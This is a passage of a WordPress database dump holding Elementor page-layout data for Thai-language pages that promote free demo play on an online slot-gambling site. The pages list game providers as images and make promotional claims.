\\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(678,99,'_thumbnail_id','61'),(683,100,'_elementor_edit_mode','builder'),(684,100,'_elementor_template_type','wp-page'),(685,100,'_elementor_version','3.32.5'),(686,100,'_elementor_pro_version','3.32.3'),(687,100,'_wp_page_template','default'),(688,100,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(689,100,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e17\\u0e32\\u0e07\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15pg\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e23\\u0e35\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21 \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e1d\\u0e35\\u0e21\\u0e37\\u0e2d \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49\\u0e08\\u0e32\\u0e01 USA \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e41\\u0e17\\u0e49 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e41\\u0e15\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e04\\u0e22\\u0e25\\u0e2d\\u0e07\\u0e16\\u0e37\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e1e\\u0e25\\u0e32\\u0e14\\u0e21\\u0e32\\u0e01 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e23\\u0e39\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/PG_-_Megabet333-Biz.webp\",\"id\":59,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Microgaming_-_Megabet333-Biz.webp\",\"id\":57,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JILI_-_Megabet333-Biz.webp\",\"id\":54,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/JOKER_-_Megabet333-Biz.webp\",\"id\":55,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_xo_-_Megabet333-Biz.webp\",\"id\":62,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Pragmatic_-_Megabet333-Biz.webp\",\"id\":58,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(690,100,'_thumbnail_id','61'),(693,101,'_elementor_edit_mode','builder'),(694,101,'_elementor_template_type','wp-page'),(695,101,'_elementor_version','3.32.5'),(696,101,'_elementor_pro_version','3.32.3'),(697,101,'_wp_page_template','default'),(698,101,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(699,101,'_elementor_data','[{\"id\":\"598df98\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"1de4a1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dd4f8a9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Slot_demo_play_-_Megabet333-Biz.webp\",\"id\":61,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aaa47de\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2a7956e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a97ca87\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e1f\\u0e23\\u0e35 \\u0e04\\u0e25\\u0e34\\u0e01!\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"motion_fx_tilt_direction\":\"negative\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"d82bac9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"763d481\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Prompt\",\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b45af85\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1bdd864\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e50ba5\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\n \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 API \\u0e41\\u0e17\\u0e49 \\u0e08\\u0e32\\u0e01 USA\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f8cc97\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"354\\\" data-end=\\\"699\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 megabet \\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e17\\u0e23\\u0e19\\u0e14\\u0e4c\\u0e22\\u0e2d\\u0e14\\u0e2e\\u0e34\\u0e15\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c 